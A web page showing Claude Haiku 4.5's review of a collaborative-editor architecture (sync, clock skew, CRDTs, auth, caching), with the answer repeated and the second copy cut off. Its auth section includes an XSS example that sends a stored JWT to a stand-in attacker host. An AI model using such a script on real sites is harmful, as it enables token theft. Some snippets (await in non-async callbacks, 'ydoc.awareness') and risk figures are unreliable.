Debug This Architecture

Claude Haiku 4 5's response to the 'Debug This Architecture' challenge.

Claude Haiku 4.5

February 3, 2026

Text

?
Prompt

Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.

Response

Claude Haiku 4.5Debug This Architecture

Claude Haiku 4.5

Critical Analysis: Real-Time Collaborative Editor Architecture

🔴 CRITICAL ISSUES

1. Split-Brain Synchronization Between Servers

Problem: Clients connected to different servers can't see each other's changes in real-time.

Server A receives edit from User 1 → broadcasts only to its WebSocket clients
Server B (User 2 connected) polls DB every 2 seconds → 0-2s latency for User 2
Creates perception of "lag" and inconsistent experience

Race Condition Example:

T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2
Result: Inconsistent state between servers

Solutions:

Solution	Trade-offs
Redis Pub/Sub for inter-server messaging	+Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed
Use WebSocket gateway (e.g., Socket.io with Redis adapter)	+Battle-tested, -Architectural change, -Added latency layer
Event sourcing + distributed log (Kafka)	+Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits

Recommended: Redis Pub/Sub with message versioning:

// Server A receives edit
async function handleEdit(userId, docId, change, timestamp) {
  const version = await db.incrementDocVersion(docId);
  
  // Broadcast to local clients
  broadcastToLocalClients(docId, { ...change, version, timestamp });
  
  // Broadcast to all servers via Redis
  await redis.publish(`doc:${docId}`, JSON.stringify({
    type: 'edit',
    change,
    version,
    timestamp,
    serverId: process.env.SERVER_ID
  }));
  
  // Write to DB
  await db.saveChange(docId, change, version, timestamp);
}

// All servers listen
redis.subscribe(`doc:*`);
redis.on('message', (channel, message) => {
  const { docId } = parseChannel(channel);
  const { serverId, version } = JSON.parse(message);
  
  // Ignore if from own server (already broadcast)
  if (serverId === process.env.SERVER_ID) return;
  
  // Broadcast to local clients with version info
  broadcastToLocalClients(docId, JSON.parse(message));
});

2. Client Clock Skew Destroys Conflict Resolution

Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.

User A's clock is 5 seconds behind
User A edits at 10:00:05 (their clock) = 10:00:10 (server time)
User B edits at 10:00:08 (their clock) = 10:00:08 (server time)
User A's edit "wins" even though User B edited later in real-time

Concrete Failure:

Real timeline:
T0 (10:00:00): User B clicks and starts typing "Hello"
T5 (10:00:05): User A clicks and types "Hi" (but A's clock says 10:00:00)
T6 (10:00:06): User B finishes typing

Server receives:
- Edit from A: timestamp=10:00:00, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"

LWW resolution: A's edit wins (earlier timestamp)
Reality: B edited first, but loses

Solutions:

Solution	Trade-offs
Server-assigned timestamps	+Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency
Hybrid: Client timestamp + server sequence number	+Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution
Operational Transformation (OT)	+Handles concurrent edits correctly, -Complex implementation, -Difficult to debug
CRDT (Conflict-free RDT)	+Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes

Recommended: Hybrid approach with server sequence numbers:

// Client sends timestamp, server assigns sequence
async function saveChange(docId, change, clientTimestamp) {
  const serverSequence = await db.getNextSequence(docId);
  const serverTimestamp = Date.now();
  
  const changeRecord = {
    docId,
    change,
    clientTimestamp,      // For audit/debugging only
    serverTimestamp,      // For ordering
    serverSequence,       // Tiebreaker
    userId,
    version
  };
  
  // Conflict resolution uses: (serverSequence, userId) not timestamps
  await db.saveChange(changeRecord);
  
  return { serverSequence, serverTimestamp };
}

// Conflict resolution
function resolveConflict(edit1, edit2) {
  // Use server sequence as source of truth
  if (edit1.serverSequence > edit2.serverSequence) return edit1;
  if (edit2.serverSequence > edit1.serverSequence) return edit2;
  
  // Tiebreaker: lexicographic on userId (deterministic)
  return edit1.userId < edit2.userId ? edit1 : edit2;
}

3. Last-Write-Wins Loses Content

Problem: When two users edit overlapping content, one user's work is silently deleted.

Example:

Initial: "The quick brown fox"

User A (para 0-19): Replaces with "The fast brown fox"
User B (para 4-9): Replaces with "The slow brown fox"

With LWW on timestamp:
- If B's edit has later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning shown to either user

Why it matters: Unacceptable in production. Users lose work without knowing.

Solutions:

Solution	Trade-offs
Show conflict UI to users	+Explicit, -Interrupts flow, -Requires UX design
CRDT (Automerge/Yjs)	+Automatic sensible merges, +Offline support, -Significant rewrite
Operational Transform	+Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve
Locking mechanism	+Prevents conflicts, -Reduces concurrency, -Degrades to pessimistic locking

Recommended: CRDT with Yjs (minimal rewrite):

// Replace full-snapshot storage with CRDT
import * as Y from 'yjs';

class DocumentManager {
  constructor(docId) {
    this.ydoc = new Y.Doc();
    this.ytext = this.ydoc.getText('shared');
  }
  
  // Load from DB
  async load(docId) {
    const updates = await db.getYjsUpdates(docId);
    updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
  }
  
  // Local edit
  applyLocalChange(index, length, text) {
    this.ytext.delete(index, length);
    this.ytext.insert(index, text);
    
    // Serialize and broadcast
    const update = Y.encodeStateAsUpdate(this.ydoc);
    return update;
  }
  
  // Remote edit
  applyRemoteUpdate(update) {
    Y.applyUpdate(this.ydoc, update);
    // Yjs automatically merges non-overlapping edits
    // Overlapping edits use deterministic CRDT rules
  }
  
  // Periodic persistence
  async saveUpdate(update) {
    await db.saveYjsUpdate(docId, update);
  }
}

4. Polling Every 2 Seconds Doesn't Scale

Problem: Cross-server synchronization via polling is fundamentally unscalable.

Math:

100 servers, 1000 documents
Each server polls all documents every 2s
Query load: (100 × 1000) / 2 = 50,000 queries/second
At 10 documents per server average: still 5,000 QPS
PostgreSQL struggles at 1,000 QPS for complex queries

Bottleneck:

-- This query runs 50,000 times/second
SELECT * FROM changes 
WHERE doc_id = ? 
AND created_at > ? 
ORDER BY created_at;

Solutions:

Solution	Trade-offs
Replace polling with Redis Pub/Sub	+O(1) message delivery, -Requires architectural change, -Redis becomes SPOF
Increase poll interval to 10s	+Reduces load, -Increases latency to 10s, -Unacceptable UX
Use database triggers + NOTIFY (PostgreSQL)	+Native, -Requires pg_listen client, -Adds complexity
Event streaming (Kafka)	+Scalable, +Audit trail, -Operational overhead

Recommended: Redis Pub/Sub (already in stack):

// Replace polling entirely
class SyncManager {
  constructor() {
    this.pubClient = redis.createClient();
    this.subClient = redis.createClient();
  }
  
  async subscribeToDocument(docId) {
    // Subscribe once per document per server
    await this.subClient.subscribe(`changes:${docId}`);
    
    this.subClient.on('message', (channel, message) => {
      const change = JSON.parse(message);
      this.broadcastToConnectedClients(docId, change);
    });
  }
  
  async publishChange(docId, change) {
    // Instant delivery to all servers
    await this.pubClient.publish(`changes:${docId}`, 
      JSON.stringify(change)
    );
  }
}

// Remove polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);

5. 30-Second Snapshot Interval Creates Data Loss Window

Problem: User's edits between snapshots can be lost on server crash.

Scenario:

T0: Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in snapshot)
T20: Server crashes
T25: Server restarts, loads last snapshot
Result: " World" is lost

Risk Calculation:

Assume 1% server crash rate per day per server
100 servers = 1 crash per day
Average 15 seconds of data loss per crash
1000 concurrent users = ~250 users lose work daily

Solutions:

Solution	Trade-offs
Write-ahead log (WAL) for every change	+No data loss, -Disk I/O overhead, -Slower writes
Reduce snapshot interval to 5s	+Less data loss window, -6x more snapshots, -DB load increases
Event sourcing: store changes, not snapshots	+Perfect audit trail, -Requires replay on load, -Slower cold starts
Redis persistence (AOF)	+Fast, +Durable, -Adds Redis complexity

Recommended: Event sourcing with periodic snapshots:

// Store individual changes, not snapshots
async function saveChange(docId, change, version) {
  await db.query(
    `INSERT INTO changes (doc_id, change_data, version, created_at) 
     VALUES ($1, $2, $3, NOW())`,
    [docId, JSON.stringify(change), version]
  );
  
  // Create snapshot every 100 changes
  const changeCount = await db.query(
    `SELECT COUNT(*) FROM changes WHERE doc_id = $1`,
    [docId]
  );
  
  if (changeCount.rows[0].count % 100 === 0) {
    await createSnapshot(docId);
  }
}

// Load document efficiently
async function loadDocument(docId) {
  // Get latest snapshot
  const snapshot = await db.query(
    `SELECT content, version FROM snapshots 
     WHERE doc_id = $1 
     ORDER BY version DESC LIMIT 1`,
    [docId]
  );
  
  // Replay changes since snapshot
  const changes = await db.query(
    `SELECT change_data, version FROM changes 
     WHERE doc_id = $1 AND version > $2 
     ORDER BY version`,
    [docId, snapshot.rows[0]?.version || 0]
  );
  
  // Reconstruct document
  let doc = snapshot.rows[0]?.content || {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  
  return doc;
}

6. JWT Tokens in localStorage + 5-Minute API Cache = Authorization Bypass

Problem: Multiple authorization vulnerabilities.

Issue 1: localStorage is XSS-vulnerable

// Attacker injects script via malicious document content
<script>
  fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>

Issue 2: 5-minute API cache with stale auth

T0: User logs in, gets JWT (valid)
T1: Admin revokes user's access in database
T2: User makes request (still cached, bypasses auth check)
T3: Request succeeds with revoked permissions

Issue 3: 24-hour token expiry is too long

Stolen token can be used for 24 hours
Revocation takes 24 hours to take effect

Solutions:

Solution	Trade-offs
httpOnly cookies + CSRF tokens	+Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex
Short-lived tokens (15 min) + refresh tokens	+Reduces window of compromise, -More refresh requests, -Requires refresh token storage
Remove API caching for auth-required endpoints	+Always enforces current permissions, -Increases load, -Reduces performance
Token revocation list (Redis)	+Instant revocation, -Redis lookup per request, -Cache invalidation complexity

Recommended: httpOnly cookies + short-lived tokens + Redis revocation:

// Auth middleware
async function authMiddleware(req, res, next) {
  const token = req.cookies.jwt; // httpOnly cookie
  
  if (!token) return res.status(401).json({ error: 'Unauthorized' });
  
  try {
    const decoded = jwt.verify(token, SECRET, { 
      algorithms: ['HS256'],
      issuer: 'https://yourdomain.com',
      audience: 'api'
    });
    
    // Check revocation list
    const isRevoked = await redis.get(`revoked:${decoded.jti}`);
    if (isRevoked) {
      return res.status(401).json({ error: 'Token revoked' });
    }
    
    req.user = decoded;
    next();
  } catch (err) {
    return res.status(401).json({ error: 'Invalid token' });
  }
}

// Login endpoint
app.post('/login', async (req, res) => {
  const user = await authenticateUser(req.body);
  
  const token = jwt.sign(
    { 
      sub: user.id, 
      jti: crypto.randomUUID() // Unique token ID for revocation
    },
    SECRET,
    { 
      expiresIn: '15m',  // Short expiry
      issuer: 'https://yourdomain.com',
      audience: 'api'
    }
  );
  
  const refreshToken = jwt.sign(
    { sub: user.id },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );
  
  res.cookie('jwt', token, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 15 * 60 * 1000
  });
  
  res.cookie('refreshToken', refreshToken, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 7 * 24 * 60 * 60 * 1000
  });
  
  res.json({ success: true });
});

// Logout endpoint
app.post('/logout', async (req, res) => {
  const token = req.cookies.jwt;
  const decoded = jwt.decode(token);
  
  // Revoke token immediately
  await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
  
  res.clearCookie('jwt');
  res.clearCookie('refreshToken');
  res.json({ success: true });
});

// Refresh token endpoint
app.post('/refresh', (req, res) => {
  const refreshToken = req.cookies.refreshToken;
  
  try {
    const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
    
    const newToken = jwt.sign(
      { sub: decoded.sub, jti: crypto.randomUUID() },
      SECRET,
      { expiresIn: '15m' }
    );
    
    res.cookie('jwt', newToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000
    });
    
    res.json({ success: true });
  } catch (err) {
    res.status(401).json({ error: 'Invalid refresh token' });
  }
});

7. CloudFront 5-Minute Cache on Dynamic API Responses

Problem: Caching API responses breaks real-time collaboration.

Scenario:

T0: User A requests document state → Server returns "Hello"
T1: User B edits document to "Hello World"
T2: User A refreshes page within 5 minutes
T3: CloudFront returns cached "Hello" (stale data)
T4: User A continues editing from stale state
T5: Conflict when both edits merge

Solutions:

Solution	Trade-offs
Remove API caching entirely (Cache-Control: no-cache)	+Always fresh, -Increases origin load, -Slower for read-heavy workloads
Separate CDN for static assets only	+Caches CSS/JS, -Doesn't cache API, -More complex routing
Cache API by document version	+Can cache longer, -Invalidation complexity, -Requires version headers
Use Cache-Control: private, max-age=0	+Browser still caches, -CDN doesn't cache, -Minimal benefit

Recommended: Separate CDN tiers:

// Static assets (cacheable)
app.use(express.static('public', {
  setHeaders: (res, path) => {
    if (path.endsWith('.js') || path.endsWith('.css')) {
      res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
      // Include hash in filename for cache busting
    }
  }
}));

// API endpoints (not cacheable)
app.get('/api/documents/:docId', (req, res) => {
  res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
  res.setHeader('Pragma', 'no-cache');
  res.setHeader('Expires', '0');
  
  // Return document
});

// CloudFront configuration
// - Whitelist only static asset paths for caching
// - API paths bypass cache entirely
// - Use separate behaviors for different path patterns

🟠 MAJOR ISSUES

8. No Operational Transformation / Conflict Resolution for Overlapping Edits

Problem: Current LWW is too naive for real-time collaboration.

Document: "abcdef"

User A: Delete "c" (index 2)  → "abdef"
User B: Insert "X" at index 3 → "abcXdef"

What should happen?
- If A deletes first: "abXdef" (B's insertion shifts)
- If B inserts first: "abdXef" (A deletes from new position)

LWW just picks one completely, losing the other edit

Solutions:

Solution	Trade-offs
Implement OT (Operational Transform)	+Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug
Use CRDT library (Yjs/Automerge)	+Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead
Pessimistic locking	+Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks)

Recommended: Yjs (already mentioned in #3, but critical enough to restate):

// With Yjs, this just works
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');

// User A
ytext.delete(2, 1);  // Delete "c"

// User B (concurrent)
ytext.insert(3, 'X');  // Insert "X"

// Result: "abXdef" (deterministic, both edits preserved)

9. No Presence/Awareness Features

Problem: Users don't know who else is editing or where.

Risks:

Two users unknowingly edit the same section (creates conflicts)
Users don't see cursor positions (confusing experience)
No indication of who made which change

Solutions:

Solution	Trade-offs
Cursor presence via WebSocket	+Real-time, +Low latency, -Requires tracking per connection
Activity log in sidebar	+Shows recent edits, -Not real-time, -Requires polling
Collaborative cursors library	+Battle-tested, +Integrates with CRDT, -Adds dependencies

Recommended: Yjs with y-protocols for awareness:

import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';

const ydoc = new Y.Doc();
const awareness = ydoc.awareness;

// Broadcast local state
awareness.setLocalState({
  user: {
    name: currentUser.name,
    color: currentUser.color,
    clientID: ydoc.clientID
  },
  cursor: {
    anchor: 0,
    head: 5
  }
});

// Listen for remote changes
awareness.on('change', changes => {
  changes.forEach(clientID => {
    const state = awareness.getStates().get(clientID);
    if (state) {
      renderRemoteCursor(clientID, state.cursor);
    }
  });
});

10. No Offline Support

Problem: Users lose connection → edits are lost.

Solutions:

Solution	Trade-offs
Local storage queue + retry	+Simple, -Manual sync logic, -Data loss on browser crash
Service Worker + IndexedDB	+Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity
CRDT with local persistence	+Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload

Recommended: Yjs with IndexedDB persistence:

import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';

const ydoc = new Y.Doc();
const persistence = new IndexeddbPersistence('document-id', ydoc);

persistence.whenSynced.then(() => {
  console.log('Loaded from IndexedDB');
});

// Works offline: edits stored in IndexedDB
ytext.insert(0, 'offline edit');

// On reconnect: automatically syncs via WebSocket

11. Load Balancer Round-Robin Doesn't Ensure Sticky Sessions

Problem: User reconnects → routed to different server → loses WebSocket state.

Scenario:

Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)
Result: User A's edits don't broadcast to their own clients

Solutions:

Solution	Trade-offs
Sticky sessions (IP hash or cookie)	+Keeps user on same server, -Uneven load distribution, -Server failures lose connections
Shared session store (Redis)	+Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request
WebSocket gateway (e.g., Socket.io)	+Handles reconnection, +Automatic load balancing, -Additional latency

Recommended: Sticky sessions + Redis fallback:

// Nginx config
upstream api_servers {
  ip_hash;  // Route based on client IP
  server api1.internal:3000;
  server api2.internal:3000;
  server api3.internal:3000;
}

// Node.js: Store WebSocket metadata in Redis
const wsClients = new Map(); // Local cache

io.on('connection', (socket) => {
  const userId = socket.handshake.auth.userId;
  const serverId = process.env.SERVER_ID;
  
  // Track locally
  wsClients.set(userId, socket);
  
  // Also store in Redis for failover
  await redis.setex(
    `ws:${userId}`,
    3600,
    JSON.stringify({ serverId, socketId: socket.id })
  );
  
  socket.on('disconnect', () => {
    wsClients.delete(userId);
    await redis.del(`ws:${userId}`);
  });
});

// Broadcast to user (works across servers)
async function broadcastToUser(userId, message) {
  // Try local first
  const localSocket = wsClients.get(userId);
  if (localSocket) {
    localSocket.emit('update', message);
    return;
  }
  
  // Check Redis for user's server
  const wsInfo = await redis.get(`ws:${userId}`);
  if (wsInfo) {
    const { serverId } = JSON.parse(wsInfo);
    // Publish to that server's Redis channel
    await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
  }
}

12. No Rate Limiting

Problem: Malicious user can spam edits → DoS.

Attacker: Send 1000 edits/second
Result: Database overloaded, all users experience lag

Solutions:

Solution	Trade-offs
Token bucket per user	+Fair, +Configurable, -Requires tracking per user
Redis rate limiter	+Fast, +Distributed, -Redis lookup per request
Adaptive rate limiting	+Responds to load, -More complex

Recommended: Redis token bucket:

async function checkRateLimit(userId, docId) {
  const key = `ratelimit:${userId}:${docId}`;
  const limit = 100; // 100 edits per minute
  const window = 60;
  
  const current = await redis.incr(key);
  if (current === 1) {
    await redis.expire(key, window);
  }
  
  if (current > limit) {
    throw new Error('Rate limit exceeded');
  }
}

// Use in edit handler
io.on('connection', (socket) => {
  socket.on('edit', async (data) => {
    try {
      await checkRateLimit(socket.userId, data.docId);
      await handleEdit(data);
    } catch (err) {
      socket.emit('error', { message: 'Rate limit exceeded' });
    }
  });
});

13. No Audit Trail

Problem: Can't answer "who changed what when" or recover from mistakes.

Solutions:

Solution	Trade-offs
Store all changes in audit table	+Complete history, +Can restore any version, -Storage overhead
Event sourcing	+Audit trail is primary source, +Can replay, -Architectural change
Immutable log (Kafka)	+Durable, +Scalable, -Operational complexity

Recommended: Audit table (simple):

async function saveChange(docId, change, userId) {
  const changeId = crypto.randomUUID();
  
  await db.query(
    `INSERT INTO document_changes 
     (id, doc_id, user_id, change_data, created_at) 
     VALUES ($1, $2, $3, $4, NOW())`,
    [changeId, docId, userId, JSON.stringify(change)]
  );
  
  return changeId;
}

// Query audit trail
async function getHistory(docId, limit = 100) {
  return db.query(
    `SELECT id, user_id, change_data, created_at 
     FROM document_changes 
     WHERE doc_id = $1 
     ORDER BY created_at DESC 
     LIMIT $2`,
    [docId, limit]
  );
}

// Restore to specific point
async function restoreToVersion(docId, changeId) {
  const changes = await db.query(
    `SELECT change_data FROM document_changes 
     WHERE doc_id = $1 AND created_at <= 
       (SELECT created_at FROM document_changes WHERE id = $2)
     ORDER BY created_at`,
    [docId, changeId]
  );
  
  let doc = {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  
  return doc;
}

🟡 MODERATE ISSUES

14. No Concurrency Control for Document Metadata

Problem: What if two users rename the same document simultaneously?

Solutions:

Use optimistic locking with version numbers
Serialize metadata updates through single queue

15. Database Read Replicas May Lag

Problem: User reads stale data from replica.

Solutions:

Use read-after-write consistency
Route critical reads to primary
Use PostgreSQL logical replication (lower latency)

16. No Disaster Recovery Plan

Problem: Database corruption → all documents lost.

Solutions:

Daily backups to S3
Point-in-time recovery (PostgreSQL WAL archiving)
Regular restore drills

Summary Table

Issue	Severity	Root Cause	Recommended Fix	Effort
Split-brain sync	CRITICAL	No inter-server messaging	Redis Pub/Sub	Medium
Client clock skew	CRITICAL	Client-side timestamps	Server sequence numbers	Low
LWW data loss	CRITICAL	Naive conflict resolution	CRDT (Yjs)	High
Polling scalability	CRITICAL	50k QPS polling	Redis Pub/Sub	Medium
Snapshot data loss	CRITICAL	30s window	Event sourcing	Medium
Auth bypass	CRITICAL	localStorage + cache	httpOnly + short-lived tokens	Medium
API caching	CRITICAL	CloudFront on dynamic data	Separate static/API CDN	Low
No OT/CRDT	MAJOR	Naive conflict resolution	Yjs library	High
No offline support	MAJOR	Missing persistence	IndexedDB + Yjs	Medium
Sticky sessions	MAJOR	Round-robin LB	IP hash + Redis	Low
No rate limiting	MAJOR	Missing limits	Redis token bucket	Low
No audit trail	MAJOR	Missing logging	Audit table	Low

The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Haiku 4.5

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2025-10-15
Size: LARGE
Context: 200,000 tokens

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Haiku 4.5 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Rival

Back to Claude Haiku 4.5

Debug This Architecture

Claude Haiku 4 5's response to the 'Debug This Architecture' challenge.

Claude Haiku 4.5

February 3, 2026

Text

?
Prompt

Response

Claude Haiku 4.5Debug This Architecture

Claude Haiku 4.5

Critical Analysis: Real-Time Collaborative Editor Architecture

🔴 CRITICAL ISSUES

1. Split-Brain Synchronization Between Servers

Problem: Clients connected to different servers can't see each other's changes in real-time.

Server A receives edit from User 1 → broadcasts only to its WebSocket clients
Server B (User 2 connected) polls DB every 2 seconds → 0-2s latency for User 2
Creates perception of "lag" and inconsistent experience

Race Condition Example:

T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2
Result: Inconsistent state between servers

Solutions:

Solution	Trade-offs
Redis Pub/Sub for inter-server messaging	+Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed
Use WebSocket gateway (e.g., Socket.io with Redis adapter)	+Battle-tested, -Architectural change, -Added latency layer
Event sourcing + distributed log (Kafka)	+Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits

Recommended: Redis Pub/Sub with message versioning:

// Server A receives edit
async function handleEdit(userId, docId, change, timestamp) {
  const version = await db.incrementDocVersion(docId);
  
  // Broadcast to local clients
  broadcastToLocalClients(docId, { ...change, version, timestamp });
  
  // Broadcast to all servers via Redis
  await redis.publish(`doc:${docId}`, JSON.stringify({
    type: 'edit',
    change,
    version,
    timestamp,
    serverId: process.env.SERVER_ID
  }));
  
  // Write to DB
  await db.saveChange(docId, change, version, timestamp);
}

// All servers listen
redis.subscribe(`doc:*`);
redis.on('message', (channel, message) => {
  const { docId } = parseChannel(channel);
  const { serverId, version } = JSON.parse(message);
  
  // Ignore if from own server (already broadcast)
  if (serverId === process.env.SERVER_ID) return;
  
  // Broadcast to local clients with version info
  broadcastToLocalClients(docId, JSON.parse(message));
});

2. Client Clock Skew Destroys Conflict Resolution

Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.

User A's clock is 5 seconds behind
User A edits at 10:00:05 (their clock) = 10:00:10 (server time)
User B edits at 10:00:08 (their clock) = 10:00:08 (server time)
User A's edit "wins" even though User B edited later in real-time

Concrete Failure:

Real timeline:
T0 (10:00:00): User B clicks and starts typing "Hello"
T5 (10:00:05): User A clicks and types "Hi" (but A's clock says 10:00:00)
T6 (10:00:06): User B finishes typing

Server receives:
- Edit from A: timestamp=10:00:00, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"

LWW resolution: A's edit wins (earlier timestamp)
Reality: B edited first, but loses

Solutions:

Solution	Trade-offs
Server-assigned timestamps	+Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency
Hybrid: Client timestamp + server sequence number	+Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution
Operational Transformation (OT)	+Handles concurrent edits correctly, -Complex implementation, -Difficult to debug
CRDT (Conflict-free RDT)	+Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes

Recommended: Hybrid approach with server sequence numbers:

// Client sends timestamp, server assigns sequence
async function saveChange(docId, change, clientTimestamp) {
  const serverSequence = await db.getNextSequence(docId);
  const serverTimestamp = Date.now();
  
  const changeRecord = {
    docId,
    change,
    clientTimestamp,      // For audit/debugging only
    serverTimestamp,      // For ordering
    serverSequence,       // Tiebreaker
    userId,
    version
  };
  
  // Conflict resolution uses: (serverSequence, userId) not timestamps
  await db.saveChange(changeRecord);
  
  return { serverSequence, serverTimestamp };
}

// Conflict resolution
function resolveConflict(edit1, edit2) {
  // Use server sequence as source of truth
  if (edit1.serverSequence > edit2.serverSequence) return edit1;
  if (edit2.serverSequence > edit1.serverSequence) return edit2;
  
  // Tiebreaker: lexicographic on userId (deterministic)
  return edit1.userId < edit2.userId ? edit1 : edit2;
}

3. Last-Write-Wins Loses Content

Problem: When two users edit overlapping content, one user's work is silently deleted.

Example:

Initial: "The quick brown fox"

User A (para 0-19): Replaces with "The fast brown fox"
User B (para 4-9): Replaces with "The slow brown fox"

With LWW on timestamp:
- If B's edit has later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning shown to either user

Why it matters: Unacceptable in production. Users lose work without knowing.

Solutions:

Solution	Trade-offs
Show conflict UI to users	+Explicit, -Interrupts flow, -Requires UX design
CRDT (Automerge/Yjs)	+Automatic sensible merges, +Offline support, -Significant rewrite
Operational Transform	+Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve
Locking mechanism	+Prevents conflicts, -Reduces concurrency, -Degrades to pessimistic locking

Recommended: CRDT with Yjs (minimal rewrite):

// Replace full-snapshot storage with CRDT
import * as Y from 'yjs';

class DocumentManager {
  constructor(docId) {
    this.ydoc = new Y.Doc();
    this.ytext = this.ydoc.getText('shared');
  }
  
  // Load from DB
  async load(docId) {
    const updates = await db.getYjsUpdates(docId);
    updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
  }
  
  // Local edit
  applyLocalChange(index, length, text) {
    this.ytext.delete(index, length);
    this.ytext.insert(index, text);
    
    // Serialize and broadcast
    const update = Y.encodeStateAsUpdate(this.ydoc);
    return update;
  }
  
  // Remote edit
  applyRemoteUpdate(update) {
    Y.applyUpdate(this.ydoc, update);
    // Yjs automatically merges non-overlapping edits
    // Overlapping edits use deterministic CRDT rules
  }
  
  // Periodic persistence
  async saveUpdate(update) {
    await db.saveYjsUpdate(docId, update);
  }
}

4. Polling Every 2 Seconds Doesn't Scale

Problem: Cross-server synchronization via polling is fundamentally unscalable.

Math:

100 servers, 1000 documents
Each server polls all documents every 2s
Query load: (100 × 1000) / 2 = 50,000 queries/second
At 10 documents per server average: still 5,000 QPS
PostgreSQL struggles at 1,000 QPS for complex queries

Bottleneck:

-- This query runs 50,000 times/second
SELECT * FROM changes 
WHERE doc_id = ? 
AND created_at > ? 
ORDER BY created_at;

Solutions:

Solution	Trade-offs
Replace polling with Redis Pub/Sub	+O(1) message delivery, -Requires architectural change, -Redis becomes SPOF
Increase poll interval to 10s	+Reduces load, -Increases latency to 10s, -Unacceptable UX
Use database triggers + NOTIFY (PostgreSQL)	+Native, -Requires pg_listen client, -Adds complexity
Event streaming (Kafka)	+Scalable, +Audit trail, -Operational overhead

Recommended: Redis Pub/Sub (already in stack):

// Replace polling entirely
class SyncManager {
  constructor() {
    this.pubClient = redis.createClient();
    this.subClient = redis.createClient();
  }
  
  async subscribeToDocument(docId) {
    // Subscribe once per document per server
    await this.subClient.subscribe(`changes:${docId}`);
    
    this.subClient.on('message', (channel, message) => {
      const change = JSON.parse(message);
      this.broadcastToConnectedClients(docId, change);
    });
  }
  
  async publishChange(docId, change) {
    // Instant delivery to all servers
    await this.pubClient.publish(`changes:${docId}`, 
      JSON.stringify(change)
    );
  }
}

// Remove polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);

5. 30-Second Snapshot Interval Creates Data Loss Window

Problem: User's edits between snapshots can be lost on server crash.

Scenario:

T0: Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in snapshot)
T20: Server crashes
